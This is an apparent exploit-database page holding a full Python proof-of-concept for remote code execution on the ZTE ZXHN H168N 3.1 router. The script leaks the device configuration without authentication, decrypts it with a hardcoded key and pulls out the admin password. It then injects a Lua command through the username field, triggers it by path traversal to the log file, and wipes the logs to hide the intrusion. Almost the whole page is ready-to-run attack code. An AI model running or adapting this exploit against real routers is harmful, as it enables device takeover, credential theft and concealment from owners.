Jump to content

ZTE ZXHN H168N 3.1 - Remote Code Execution (RCE) via authentication bypass

# Exploit Title:  ZTE ZXHN H168N 3.1 - RCE via authentication bypass
# Author: l34n / tasos meletlidis
# Exploit Blog: https://i0.rs/blog/finding-0click-rce-on-two-zte-routers/

import http.client, requests, os, argparse, struct, zlib
from io import BytesIO
from os import stat
from Crypto.Cipher import AES

def login(host, port, username, password):
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }

    data = {
        "Username": username,
        "Password": password,
        "Frm_Logintoken": "",
        "action": "login"
    }
    
    requests.post(f"http://{host}:{port}/", headers=headers, data=data)

def logout(host, port):
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }

    data = {
        "IF_LogOff": "1",
        "IF_LanguageSwitch": "",
        "IF_ModeSwitch": ""
    }
    
    requests.post(f"http://{host}:{port}/", headers=headers, data=data)    

def leak_config(host, port):
    conn = http.client.HTTPConnection(host, port)
    boundary = "---------------------------25853724551472601545982946443"
    body = (
        f"{boundary}\r\n"
        'Content-Disposition: form-data; name="config"\r\n'
        "\r\n"
        "\r\n"
        f"{boundary}--\r\n"
    )

    headers = {
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body)),
        "Connection": "keep-alive",
    }

    conn.request("POST", "/getpage.lua?pid=101&nextpage=ManagDiag_UsrCfgMgr_t.lp", body, headers)

    response = conn.getresponse()
    response_data = response.read()

    with open("config.bin", "wb") as file:
        file.write(response_data)

    conn.close()

def _read_exactly(fd, size, desc="data"):
    chunk = fd.read(size)
    if len(chunk) != size:
        return None
    return chunk

def _read_struct(fd, fmt, desc="struct"):
    size = struct.calcsize(fmt)
    data = _read_exactly(fd, size, desc)
    if data is None:
        return None
    return struct.unpack(fmt, data)

def read_aes_data(fd_in, key):
    encrypted_data = b""
    while True:
        aes_hdr = _read_struct(fd_in, ">3I", desc="AES chunk header")
        if aes_hdr is None:
            return None
        _, chunk_len, marker = aes_hdr

        chunk = _read_exactly(fd_in, chunk_len, desc="AES chunk data")
        if chunk is None:
            return None

        encrypted_data += chunk
        if marker == 0:
            break

    cipher = AES.new(key.ljust(16, b"\0")[:16], AES.MODE_ECB)
    fd_out = BytesIO()
    fd_out.write(cipher.decrypt(encrypted_data))
    fd_out.seek(0)
    return fd_out

def read_compressed_data(fd_in, enc_header):
    hdr_crc = zlib.crc32(struct.pack(">6I", *enc_header[:6]))
    if enc_header[6] != hdr_crc:
        return None

    total_crc = 0
    fd_out = BytesIO()

    while True:
        comp_hdr = _read_struct(fd_in, ">3I", desc="compression chunk header")
        if comp_hdr is None:
            return None
        uncompr_len, compr_len, marker = comp_hdr

        chunk = _read_exactly(fd_in, compr_len, desc="compression chunk data")
        if chunk is None:
            return None

        total_crc = zlib.crc32(chunk, total_crc)
        uncompressed = zlib.decompress(chunk)
        if len(uncompressed) != uncompr_len:
            return None

        fd_out.write(uncompressed)
        if marker == 0:
            break

    if enc_header[5] != total_crc:
        return None

    fd_out.seek(0)
    return fd_out

def read_config(fd_in, fd_out, key):
    ver_header_1 = _read_struct(fd_in, ">5I", desc="1st version header")
    if ver_header_1 is None:
        return

    ver_header_2_offset = 0x14 + ver_header_1[4]

    fd_in.seek(ver_header_2_offset)
    ver_header_2 = _read_struct(fd_in, ">11I", desc="2nd version header")
    if ver_header_2 is None:
        return
    ver_header_3_offset = ver_header_2[10]

    fd_in.seek(ver_header_3_offset)
    ver_header_3 = _read_struct(fd_in, ">2H5I", desc="3rd version header")
    if ver_header_3 is None:
        return
    signed_cfg_size = ver_header_3[3]

    file_size = stat(fd_in.name).st_size

    fd_in.seek(0x80)
    sign_header = _read_struct(fd_in, ">3I", desc="signature header")
    if sign_header is None:
        return
    if sign_header[0] != 0x04030201:
        return

    sign_length = sign_header[2]

    signature = _read_exactly(fd_in, sign_length, desc="signature")
    if signature is None:
        return

    enc_header_raw = _read_exactly(fd_in, 0x3C, desc="encryption header")
    if enc_header_raw is None:
        return
    encryption_header = struct.unpack(">15I", enc_header_raw)
    if encryption_header[0] != 0x01020304:
        return

    enc_type = encryption_header[1]

    if enc_type in (1, 2):
        if not key:
            return
        fd_in = read_aes_data(fd_in, key)
        if fd_in is None:
            return

    if enc_type == 2:
        enc_header_raw = _read_exactly(fd_in, 0x3C, desc="second encryption header")
        if enc_header_raw is None:
            return
        encryption_header = struct.unpack(">15I", enc_header_raw)
        if encryption_header[0] != 0x01020304:
            return
        enc_type = 0

    if enc_type == 0:
        fd_in = read_compressed_data(fd_in, encryption_header)
        if fd_in is None:
            return

    fd_out.write(fd_in.read())
    
def decrypt_config(config_key):
    encrypted = open("config.bin", "rb")
    decrypted = open("decrypted.xml", "wb")
    
    read_config(encrypted, decrypted, config_key)
    
    with open("decrypted.xml", "r") as file:
        contents = file.read()
        username = contents.split("IGD.AU2")[1].split("User")[1].split("val=\"")[1].split("\"")[0]
        password = contents.split("IGD.AU2")[1].split("Pass")[1].split("val=\"")[1].split("\"")[0]
        
    encrypted.close()
    os.system("rm config.bin")
    decrypted.close()
    os.system("rm decrypted.xml")

    return username, password

def change_log_level(host, port, log_level):
    level_map = {
        "critical": "2",
        "notice": "5"
    }

    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }

    data = {
        "IF_ACTION": "Apply",
        "_BASICCONIG": "Y",
        "LogEnable": "1",
        "LogLevel": level_map[log_level],
        "ServiceEnable": "0",
        "Btn_cancel_LogManagerConf": "",
        "Btn_apply_LogManagerConf": "",
        "downloadlog": "",
        "Btn_clear_LogManagerConf": "",
        "Btn_save_LogManagerConf": "",
        "Btn_refresh_LogManagerConf": ""
    }
    
    requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
    requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
    requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)

def change_username(host, port, new_username, old_password):
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }

    data = {
        "IF_ACTION": "Apply",
        "_InstID": "IGD.AU2",
        "Right": "2",
        "Username": new_username,
        "Password": old_password,
        "NewPassword": old_password,
        "NewConfirmPassword": old_password,
        "Btn_cancel_AccountManag": "",
        "Btn_apply_AccountManag": ""
    }

    requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_AccountManag_t.lp&Menu3Location=0")
    requests.get(f"http://{host}:{port}/common_page/accountManag_lua.lua")
    requests.post(f"http://{host}:{port}/common_page/accountManag_lua.lua", headers=headers, data=data)

def clear_log(host, port):
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }

    data = {
        "IF_ACTION": "clearlog"
    }

    requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
    requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
    requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)

def refresh_log(host, port):
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }

    data = {
        "IF_ACTION": "Refresh"
    }

    requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
    requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
    requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)

def trigger_rce(host, port):
    requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_StatusManag_t.lp&Menu3Location=0")
    requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2fuserlog.txt&Menu3Location=0")

def rce(cmd):
    return f"<? _G.os.execute('rm /var/userlog.txt;{cmd}') ?>"

def pwn(config_key, host, port):
    leak_config(host, port)
    username, password = decrypt_config(config_key)
    
    login(host, port, username, password)

    shellcode = "echo \"pwned\""
    payload = rce(shellcode)

    change_username(host, port, payload, password)
    refresh_log(host, port)
    change_log_level(host, port, "notice")
    refresh_log(host, port)

    trigger_rce(host, port)
    clear_log(host, port)

    change_username(host, port, username, password)
    change_log_level(host, port, "critical")
    logout(host, port)
    print("[+] PoC complete")

def main():
    parser = argparse.ArgumentParser(description="Run remote command on ZTE ZXHN H168N V3.1")
    parser.add_argument("--config_key", type=lambda x: x.encode(), default=b"GrWM3Hz&LTvz&f^9", help="Leaked config encryption key from cspd")
    parser.add_argument("--host", required=True, help="Target IP address of the router")
    parser.add_argument("--port", required=True, type=int, help="Target port of the router")

    args = parser.parse_args()
    
    pwn(args.config_key, args.host, args.port)

if __name__ == "__main__":
    main()
            

0 Comments

Recommended Comments

There are no comments to display.

Guest
Add a comment...